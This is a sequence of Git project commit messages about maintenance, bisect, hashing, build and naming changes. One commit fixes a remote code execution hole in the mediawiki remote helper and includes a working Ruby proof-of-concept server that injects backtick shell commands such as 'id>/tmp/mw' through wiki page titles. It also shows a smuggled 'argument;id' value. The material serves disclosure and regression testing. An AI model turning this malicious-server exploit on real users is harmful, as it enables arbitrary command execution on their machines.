A "git gc"'s big brother has been introduced to take care of more
repository maintenance tasks, not limited to the object database
cleaning.
* ds/maintenance-part-1:
maintenance: add trace2 regions for task execution
maintenance: add auto condition for commit-graph task
maintenance: use pointers to check --auto
maintenance: create maintenance.<task>.enabled config
maintenance: take a lock on the objects directory
maintenance: add --task option
maintenance: add commit-graph task
maintenance: initialize task array
maintenance: replace run_auto_gc()
maintenance: add --quiet option
maintenance: create basic maintenance runner
The object name written to this file is not exposed to end-users and
the only reader of this file immediately expands it back to a full
object name. Stop abbreviating while writing, and expect a full
object name while reading, which simplifies the code a bit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Because these constructs can be used to parse user input to be
passed to rev-list --objects, e.g.
range=$(git rev-parse v1.0..v2.0) &&
git rev-list --objects $range | git pack-objects --stdin
the endpoints (v1.0 and v2.0 in the example) are shown without
peeling them to underlying commits, even when they are annotated
tags. Make sure it stays that way.
While at it, ensure "rev-parse A...B" also keeps the endpoints A and
B unpeeled, even though the negative side (i.e. the merge-base
between A and B) has to become a commit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Protocol v2 became the default in v2.26.0 via 684ceae32d (fetch: default
to protocol version 2, 2019-12-23). More widespread use turned up a
regression in negotiation. That was fixed in v2.27.0 via 4fa3f00abb
(fetch-pack: in protocol v2, in_vain only after ACK, 2020-04-27), but we
also reverted the default to v0 as a precuation in 11c7f2a30b (Revert
"fetch: default to protocol version 2", 2020-04-22).
In v2.28.0, we re-enabled it for experimental users with 3697caf4b9
(config: let feature.experimental imply protocol.version=2, 2020-05-20)
and haven't heard any complaints. v2.28 has only been out for 2 months,
but I'd generally expect people turning on feature.experimental to also
stay pretty up-to-date. So we're not likely to collect much more data by
waiting. In addition, we have no further reports from people running
v2.26.0, and of course some people have been setting protocol.version
manually for ages.
Let's move forward with v2 as the default again. It's possible there are
still lurking bugs, but we won't know until it gets more widespread use.
And we can find and squash them just like any other bug at this point.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As of recent Visual Studio versions, CMake support is built-in:
https://docs.microsoft.com/en-us/cpp/build/cmake-projects-in-visual-studio?view=vs-2019
All that needs to be done is to open the worktree as a folder, and
Visual Studio will find the `CMakeLists.txt` file and automatically
generate the project files.
Let's ignore the entirety of those generated files.
Helped-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We already match "committer", and we're about to start
matching more things. Let's use a more neutral variable to
avoid confusion.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 06f5608c14 (bisect--helper: `bisect_start` shell function
partially in C, 2019-01-02), we changed the following shell
code:
- rev=$(git rev-parse -q --verify "$arg^{commit}") || {
- test $has_double_dash -eq 1 &&
- die "$(eval_gettext "'\$arg' does not appear to be a valid revision")"
- break
- }
- revs="$revs $rev"
into:
+ char *commit_id = xstrfmt("%s^{commit}", arg);
+ if (get_oid(commit_id, &oid) && has_double_dash)
+ die(_("'%s' does not appear to be a valid "
+ "revision"), arg);
+
+ string_list_append(&revs, oid_to_hex(&oid));
+ free(commit_id);
In case of an invalid "arg" when "has_double_dash" is false, the old
code would "break" out of the argument loop.
In the new C code though, `oid_to_hex(&oid)` is unconditonally
appended to "revs". This is wrong first because "oid" is junk as
`get_oid(commit_id, &oid)` failed and second because it doesn't break
out of the argument loop.
Not breaking out of the argument loop means that "arg" is then not
treated as a path restriction (which is wrong).
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A user who understands enough to set pull.ff does not need additional
instructions.
Signed-off-by: Alex Henrie <alexhenrie24@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The command reads list of object names to place on the ignore list
either from the command line or from a file, but they are not
checked with their object type (those read from the file are not
even checked for object existence).
Extend the oidset_parse_file() API and allow it to take a callback
that can be used to die (e.g. when an inappropriate input is read)
or modify the object name read (e.g. when a tag pointing at a commit
is read, and the caller wants a commit object name), and use it in
the code that handles ignore list.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Only skip diffstats when both oids are valid and identical. This check
was causing both false-positives (files included in diffstats with no
actual changes (0 lines modified) and false-negatives (showing 0 lines
modified in stats when files had actually changed).
Also replaced same_contents with may_differ to avoid confusion.
Signed-off-by: Thomas Guyot-Sionnest <tguyot@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit f39ad38410.
That commit was trying to silence a type-punning warning on older
versions of gcc. However, its analysis was all wrong. I didn't notice
that we _were_ in fact type-punning because there are two versions of
put_be32(): one that uses casts and unaligned loads, and another that
uses bitshifts. I looked at the latter, but on my platform we were
defaulting to the former.
However, as of the previous commit, we'll always use the bitshift
version. So we can drop this hackery to avoid the warning, making the
code slightly cleaner.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our put_be32() routine and its variants (get_be32(), put_be64(), etc)
has two implementations: on some platforms we cast memory in place and
use nothl()/htonl(), which can cause unaligned memory access. And on
others, we pick out the individual bytes using bitshifts.
This introduces extra complexity, and sometimes causes compilers to
generate warnings about type-punning. And it's not clear there's any
performance advantage.
This split goes back to 660231aa97 (block-sha1: support for
architectures with memory alignment restrictions, 2009-08-12). The
unaligned versions were part of the original block-sha1 code in
d7c208a92e (Add new optimized C 'block-sha1' routines, 2009-08-05),
which says it is:
Based on the mozilla SHA1 routine, but doing the input data accesses a
word at a time and with 'htonl()' instead of loading bytes and shifting.
Back then, Linus provided timings versus the mozilla code which showed a
27% improvement:
https://lore.kernel.org/git/alpine.LFD.2.01.0908051545000.3390@localhost.localdomain/
However, the unaligned loads were either not the useful part of that
speedup, or perhaps compilers and processors have changed since then.
Here are times for computing the sha1 of 4GB of random data, with and
without -DNO_UNALIGNED_LOADS (and BLK_SHA1=1, of course). This is with
gcc 10, -O2, and the processor is a Core i9-9880H.
[stock]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 6.638 s ± 0.081 s [User: 6.269 s, System: 0.368 s]
Range (min … max): 6.550 s … 6.841 s 10 runs
[-DNO_UNALIGNED_LOADS]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 6.418 s ± 0.015 s [User: 6.058 s, System: 0.360 s]
Range (min … max): 6.394 s … 6.447 s 10 runs
And here's the same test run on an AMD A8-7600, using gcc 8.
[stock]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 11.721 s ± 0.113 s [User: 10.761 s, System: 0.951 s]
Range (min … max): 11.509 s … 11.861 s 10 runs
[-DNO_UNALIGNED_LOADS]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 11.744 s ± 0.066 s [User: 10.807 s, System: 0.928 s]
Range (min … max): 11.637 s … 11.863 s 10 runs
So the unaligned loads don't seem to help much, and actually make things
worse. It's possible there are platforms where they provide more
benefit, but:
- the non-x86 platforms for which we use this code are old and obscure
(powerpc and s390).
- the main caller that cares about performance is block-sha1. But
these days it is rarely used anyway, in favor of sha1dc (which is
already much slower, and nobody seems to have cared that much).
Let's just drop unaligned versions entirely in the name of simplicity.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_next()` and the `bisect_auto_next()` shell functions
in C and add the subcommands to `git bisect--helper` to call them from
git-bisect.sh .
bisect_auto_next() function returns an enum bisect_error type as whole
`git bisect` can exit with an error code when bisect_next() does.
Return an error when `bisect_next()` fails, that fix a bug on shell script
version.
Using `--bisect-next` and `--bisect-auto-next` subcommands is a
temporary measure to port shell function to C so as to use the existing
test suite. As more functions are ported, `--bisect-auto-next`
subcommand will be retired and will be called by some other methods.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As there can be other revision walks after bisect_next_all(),
let's add a call to a function to clear all the marks at the
end of bisect_next_all().
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_autostart()` shell function in C and add the
C implementation from `bisect_next()` which was previously left
uncovered.
Add `--bisect-autostart` subcommand to be called from git-bisect.sh.
Using `--bisect-autostart` subcommand is a temporary measure to port
the shell function to C so as to use the existing test suite. As more
functions are ported, this subcommand will be retired and
bisect_autostart() will be called directly by `bisect_state()`.
Change behavior of shell script that returned success when user aborted
the bisection.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The update sample hook has the zero OID hardcoded as 40 zeros. However,
with the introduction of SHA-256 support, this assumption no longer
holds true. Replace the hardcoded $z40 with a call to
git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'
so the sample hook becomes hash-agnostic.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The pre-push sample hook has the zero OID hardcoded as 40 zeros.
However, with the introduction of SHA-256 support, this assumption no
longer holds true. Replace the hardcoded $z40 with a call to
git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'
so the sample hook becomes hash-agnostic.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The preferred form for a command substitution is $() over ``. Use this
form for the command substitution in the sample hook.
The preferred form for conditional tests is to use `test` over [].
Replace [] with `test`.
Finally, replace all instances of "sha" with "oid".
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git fetch --all --ipv4/--ipv6" forgot to pass the protocol options
to instances of the "git fetch" that talk to individual remotes,
which has been corrected.
* ar/fetch-ipversion-in-all:
fetch: pass --ipv4 and --ipv6 options to sub-fetches
Update to command line completion (in contrib/)
* dl/complete-format-patch-recent-features:
contrib/completion: complete options that take refs for format-patch
"git remote set-head" that failed still said something that hints
the operation went through, which was misleading.
* cs/don-t-pretend-a-failed-remote-set-head-succeeded:
remote: don't show success message when set-head fails
There is a logic to estimate how many objects are in the
repository, which is mean to run once per process invocation, but
it ran every time the estimated value was requested.
* jk/dont-count-existing-objects-twice:
packfile: actually set approximate_object_count_valid
"git for-each-ref" and friends that list refs used to allow only
one --merged or --no-merged to filter them; they learned to take
combination of both kind of filtering.
* al/ref-filter-merged-and-no-merged:
Doc: prefer more specific file name
ref-filter: make internal reachable-filter API more precise
ref-filter: allow merged and no-merged filters
Doc: cover multiple contains/no-contains filters
t3201: test multiple branch filter combinations
The 'meld' backend of the "git mergetool" learned to give the
underlying 'meld' the '--auto-merge' option, which would help
reduce the amount of text that requires manual merging.
* ls/mergetool-meld-auto-merge:
mergetool: allow auto-merge for meld to follow the vim-diff behavior
"git index-pack" learned to resolve deltified objects with greater
parallelism.
* jt/threaded-index-pack:
index-pack: make quantum of work smaller
index-pack: make resolve_delta() assume base data
index-pack: calculate {ref,ofs}_{first,last} early
index-pack: remove redundant child field
index-pack: unify threaded and unthreaded code
index-pack: remove redundant parameter
Documentation: deltaBaseCacheLimit is per-thread
"format-patch --range-diff=<prev> <origin>..HEAD" has been taught
not to ignore <origin> when <prev> is a single version.
* es/format-patch-interdiff-cleanup:
format-patch: use 'origin' as start of current-series-range when known
diff-lib: tighten show_interdiff()'s interface
diff: move show_interdiff() from its own file to diff-lib
If a user is cloning a SHA-1 repository with GIT_DEFAULT_HASH set to
"sha256", then we can end up with a repository where the repository
format version is 0 but the extensions.objectformat key is set to
"sha256". This is both wrong (the user has a SHA-1 repository) and
nonfunctional (because the extension cannot be used in a v0 repository).
This happens because in a clone, we initially set up the repository, and
then change its algorithm based on what the remote side tells us it's
using. We've initially set up the repository as SHA-256 in this case,
and then later on reset the repository version without clearing the
extension.
We could just always set the extension in this case, but that would mean
that our SHA-1 repositories weren't compatible with older Git versions,
even though there's no reason why they shouldn't be. And we also don't
want to initialize the repository as SHA-1 initially, since that means
if we're cloning an empty repository, we'll have failed to honor the
GIT_DEFAULT_HASH variable and will end up with a SHA-1 repository, not a
SHA-256 repository.
Neither of those are appealing, so let's tell the repository
initialization code if we're doing a reinit like this, and if so, to
clear the extension if we're using SHA-1. This makes sure we produce a
valid and functional repository and doesn't break any of our other use
cases.
Reported-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Spaces are replaced with tabs when possible. In some cases just
replacing spaces with tabs would break readability, so it was left as it
is.
Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
We try to flush the output from diff-highlight whenever we see a blank
line. That lets you see the output for each commit as soon as it is
generated, even if Git is still chugging away at a diff, or traversing
to find the next commit.
However, our "blank line" match checks length($_). That won't ever be
true, because we haven't chomped the line ending. As a result, we never
flush. Instead, let's use a simple regex which handles line endings in
with the end-of-line marker.
This has been broken since the initial version in 927a13fe87 (contrib:
add diff highlight script, 2011-10-18). Probably nobody noticed because:
- most output is big enough, or comes fast enough, that it flushes
anyway. And it can be difficult to notice the difference between
"show a commit, then pause" and "pause, then show two commits". I
only noticed because I was viewing "git log" output on a repo with a
very slow textconv filter.
- if stdout is going to the terminal (and not another pager like
less), then the flush isn't necessary. So any manual testing would
show it appearing to work.
You can easily see the difference with something like:
echo '* diff=slow' >>.gitattributes
git -c diff.slow.textconv='sleep 1; cat' \
-c pager.log='diff-highlight | less' \
log -p
That should generate one commit every second or so (more if it touches
multiple files), but without this patch it waits for many seconds before
generating several pages of output.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The variable core_partial_clone_filter_default has been unused since
fa3d1b63e8 ("promisor-remote: parse remote.*.partialclonefilter",
2019-06-25), when Git was changed to refer to
remote.*.partialclonefilter as the default filter when fetching in a
partial clone, but (perhaps inadvertently) there was no fallback to
core.partialclonefilter.
One alternative is to add the fallback, but the aforementioned change
was made more than a year ago and I have not heard of any complaints
regarding this matter. In addition, there is currently no mention of
core.partialclonefilter in the user documentation. So it seems best to
reaffirm that Git will only support remote.*.partialclonefilter.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since e4597aae65 (run test suite without dashed git-commands in PATH,
2009-12-02), we stopped running our tests with `git-foo` binaries found
at the top-level directory of a freshly built source tree; instead we
have placed only `git` and selected `git-foo` commands that must be on
`$PATH` in `bin-wrappers/` and prepended that `bin-wrappers/` to the
`PATH` used in the test suite. We did that to catch the tests and
scripted Git commands that still try to use the dashed form.
Since CI jobs will not install the built Git to anywhere, and the
hardlinks we make at the top-level of the source tree for `git-add` and
friends are not even used during tests, they are pure waste of resources
these days.
Thanks to the newly invented `SKIP_DASHED_BUILT_INS` knob, we can now
skip creating these links in the source tree. So let's do that.
Note that this change introduces a subtle change of behavior: when Git's
`cmd_main()` calls `setup_path()`, it inserts the value of
`GIT_EXEC_PATH` (defaulting to `<prefix>/libexec/git-core`) at the
beginning of the environment variable `PATH`. This is necessary to find
e.g. scripted commands that are installed in that location. For the
purposes of Git's test suite, the `bin-wrappers/` scripts override
`GIT_EXEC_PATH` to point to the top-level directory of the source code.
In other words, if a scripted command had used a dashed invocation of a
built-in Git command, it would not have been caught previously, which is
fixed by this change.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For a long time already, the non-dashed form of the built-ins is the
recommended way to write scripts, i.e. it is better to call `git merge
[...]` than to call `git-merge [...]`.
While Git still supports the dashed form (by hard-linking the `git`
executable to the dashed name in `libexec/git-core/`), in practice, it
is probably almost irrelevant.
However, we *do* care about keeping people's scripts working (even if
they were written before the non-dashed form started to be recommended).
Keeping this backwards-compatibility is not necessarily cheap, though:
even so much as amending the tip commit in a git.git checkout will
require re-linking all of those dashed commands. On this developer's
laptop, this makes a noticeable difference:
$ touch version.c && time make
CC version.o
AR libgit.a
LINK git-bugreport.exe
[... 11 similar lines ...]
LN/CP git-remote-https.exe
LN/CP git-remote-ftp.exe
LN/CP git-remote-ftps.exe
LINK git.exe
BUILTIN git-add.exe
[... 123 similar lines ...]
BUILTIN all
SUBDIR git-gui
SUBDIR gitk-git
SUBDIR templates
LINK t/helper/test-fake-ssh.exe
LINK t/helper/test-line-buffer.exe
LINK t/helper/test-svn-fe.exe
LINK t/helper/test-tool.exe
real 0m36.633s
user 0m3.794s
sys 0m14.141s
$ touch version.c && time make SKIP_DASHED_BUILT_INS=1
CC version.o
AR libgit.a
LINK git-bugreport.exe
[... 11 similar lines ...]
LN/CP git-remote-https.exe
LN/CP git-remote-ftp.exe
LN/CP git-remote-ftps.exe
LINK git.exe
BUILTIN git-receive-pack.exe
BUILTIN git-upload-archive.exe
BUILTIN git-upload-pack.exe
BUILTIN all
SUBDIR git-gui
SUBDIR gitk-git
SUBDIR templates
LINK t/helper/test-fake-ssh.exe
LINK t/helper/test-line-buffer.exe
LINK t/helper/test-svn-fe.exe
LINK t/helper/test-tool.exe
real 0m23.717s
user 0m1.562s
sys 0m5.210s
Also, `.zip` files do not have any standardized support for hard-links,
therefore "zipping up" the executables will result in inflated disk
usage. (To keep down the size of the "MinGit" variant of Git for
Windows, which is distributed as a `.zip` file, the hard-links are
excluded specifically.)
In addition to that, some programs that are regularly used to assess
disk usage fail to realize that those are hard-links, and heavily
overcount disk usage. Most notably, this was the case with Windows
Explorer up until the last couple of Windows 10 versions. See e.g.
https://github.com/msysgit/msysgit/issues/58.
To save on the time needed to hard-link these dashed commands, with the
plan to eventually stop shipping with those hard-links on Windows, let's
introduce a Makefile knob to skip generating them.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a hard-coded list of `.pdb` files to copy. But we are about to
introduce the `SKIP_DASHED_BUILT_INS` knob in the `Makefile`, which
might make this hard-coded list incorrect.
Let's switch to a dynamically-generated list instead.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To avoid branch names with a loaded history, we already started to avoid
using the name "master" in a couple instances.
The `t3200-branch.sh` script uses variations of this name for branches
other than the default one. So let's change those names, as
"lowest-hanging fruits" in the effort to use more inclusive naming
throughout Git's source code. While at it, make those branch names
independent from the default branch name.
In this particular instance, this rename requires a couple of
non-trivial adjustments, as the aligned output depends on the maximum
length of the displayed branches (which we now changed), and also on the
alphabetical order (which we now changed, too).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an ongoing effort to avoid non-inclusive language, let's avoid using
the branch name "master" in a code comment.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the ongoing effort to make the Git project a more inclusive place,
let's try to avoid names like "master" where possible.
In this instance, the use of the term `slave` is unfortunately enshrined
in IO::Pty's API. We simply cannot avoid using that word here. But at
least we can get rid of the usage of the word `master` and hope that
IO::Pty will be eventually adjusted, too.
Guessing that IO::Pty might follow Python's lead, we replace the name
`master` by `parent` (hoping that IO::Pty will adopt the parent/child
nomenclature, too).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the use of run_git_unquoted() completely with a use of "sh -c"
suggested by Jeff King, i.e.:
sh -c '"$@" 2>/dev/null' -- echo sneaky 'argument;id'
I don't think this is needed now for any potential RCE issue. The
$remotename argument is ultimately picked by the local user (and
similarly, the $local variable comes from a user-supplied
refspec).
But completely eliminating the use of unquoted shell arguments has a
value in and of itself, by making the code easier to review. As noted
in an earlier commit I think the use of IPC::Open3 would be too
verbose here, but this "sh -c" trick strikes the right balance between
readability and semantic sanity.
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Explicitly annotate the invocations of run_git() which don't use
quoted arguments. I'm not converting these to run_git_quoted() because
these invocations pipe stderr to /dev/null, which the Perl open() API
doesn't support.
We could do a quoted version of this with IPC::Open3, but I don't
think it's worth it to go through that here. Let's instead just mark
these sites, and comment on why it's OK to use the variables we're
using.
This eliminates the last uses of run_git(), so we can remove the alias
for it introduced in an earlier commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change those callsites that are able to call run_safe() with a quoted
list of arguments to do so.
This fixes a RCE bug in this transport helper reported by Joern
Schneeweisz to the git-security mailing list. The issue is being made
public due to the relative obscurity of the remote-mediawiki code.
The security issue is that we'd execute a command like this via Perl's
"open -|", where the $name is taken directly from the api.php
response. So that a JSON response of e.g.:
[...]"title":"`id>/tmp/mw`:Main Page"[..]
Would result in an invocation of:
git config --add remote.origin.namespaceCache "`id>/tmp/mw`:notANameSpace"
>From code such as this, which is being changed by this patch:
run_git(qq(config --add remote.${remotename}.namespaceCache "${name}:${store_id}"));
So we'd execute an arbitrary command, and also put
"remote.origin.namespaceCache=:notANameSpace" in the config. With this
change we quote all of this, so now we'll simply write
"remote.origin.namespaceCache=`id>/tmp/x`:notANameSpace" into the
config, and not execute any remote commands.
About the implementation: as noted in [1] (see also [2]) this style of
invoking open() has compatibility issues on Windows up to Perl
5.22. However, Johannes Schindelin notes that we shouldn't worry about
Windows in this context because (quoting a private E-Mail of his):
1. The mediawiki helper has never been shipped as part of an
official Git for Windows version. Neither has it ever been part
of an official MSYS2 package. Which means that Windows users
who want to use the mediawiki helper have to build Git
themselves, which not many users seem to do.
2. The last Git for Windows version to ship with Perl v5.22.x was
Git for Windows v2.11.1; Since Git for Windows
v2.12.0 (released on February 25th, 2017), only newer Perl
versions were included.
So let's just use this open() API. Grepping around shows that various
other Perl code we ship such as gitweb etc. uses this way of calling
open(), so we shouldn't have any issues with compatibility.
For further reference and future testing, here's working exploit code
provided by Joern:
#!/usr/bin/ruby
# git client side RCE via `mediawiki` remote proof of concept
# Joern Schneeweisz - GitLab Security Research Team
require 'sinatra'
set bind: '0.0.0.0'
if not ARGV[0]
puts "Please provide the shell command to be execucted."
exit -1
end
cmd = ARGV[0]
all_pages = sprintf('{"limits":{"allpages":500},"query":{"allpages":[{"pageid":1,"ns":3,"title":"`%s`:Main Page"}]}}', cmd)
revs = sprintf('{"query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0,"user":"MediaWiki default","timestamp":"2020-09-04T20:25:08Z","contentformat":"text/x-wiki","contentmodel":"wikitext","comment":"","*":"<al:MyLanguage/Help:Contents]"}]}}}}', cmd)
mainpage= sprintf('{"batchcomplete":"","query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0}]}}}}',cmd)
post '/api.php' do
if params[:list] == 'allpages'
return all_pages
end
if params[:prop] == 'revisions'
return revs
end
return mainpage
end
Which:
[...] should be run like: `ruby wiki.rb 'id>/tmp/mw'`. Now when
being cloned with `git clone mediawiki::http://localhost:4567` the
file `/tmp/mw` will be created during the clone process,
containing the output of `id`.
1. https://perldoc.perl.org/functions/open.html#Opening-a-filehandle-into-a-command
2. https://perldoc.perl.org/perlipc.html#Safe-Pipe-Opens
Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Invoking commands as "git $args" doesn't quote $args. Let's support
["git", $args] as well, and create corresponding run_git_quoted() and
run_git_unquoted() aliases for subsequent changes when we move the
code over to the new style of invoking this function. At that point
we'll delete the then-unused run_git() wrapper.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
These tests consistently fail for me, and were failing before any of
the changes in this series. As noted in [1] there are some known
intermittent test failures. Let's mark these as failing so we can have
an otherwise passing test suite.
We need to add an extra test_path_is_file() here because since
d572f52a64 ("test_cmp: diagnose incorrect arguments", 2020-08-09)
test_cmp has errored out with a BUG if one of the test arguments
doesn't exist, without that the test would still fail even without
test_expect_failure().
1. https://github.com/Git-Mediawiki/Git-Mediawiki/issues/56
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix a bug with revisions being imported twice. This commit is being
backported from Git-Mediawiki.git's e41ee9b ("All revisions imported
twice", 2018-02-02) to git.git. See [1] for the original commit and
[2] and [3] for the upstream PR and issue.
1. e41ee9b3a3
2. https://github.com/Git-Mediawiki/Git-Mediawiki/pull/61
3. https://github.com/Git-Mediawiki/Git-Mediawiki/issues/29
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>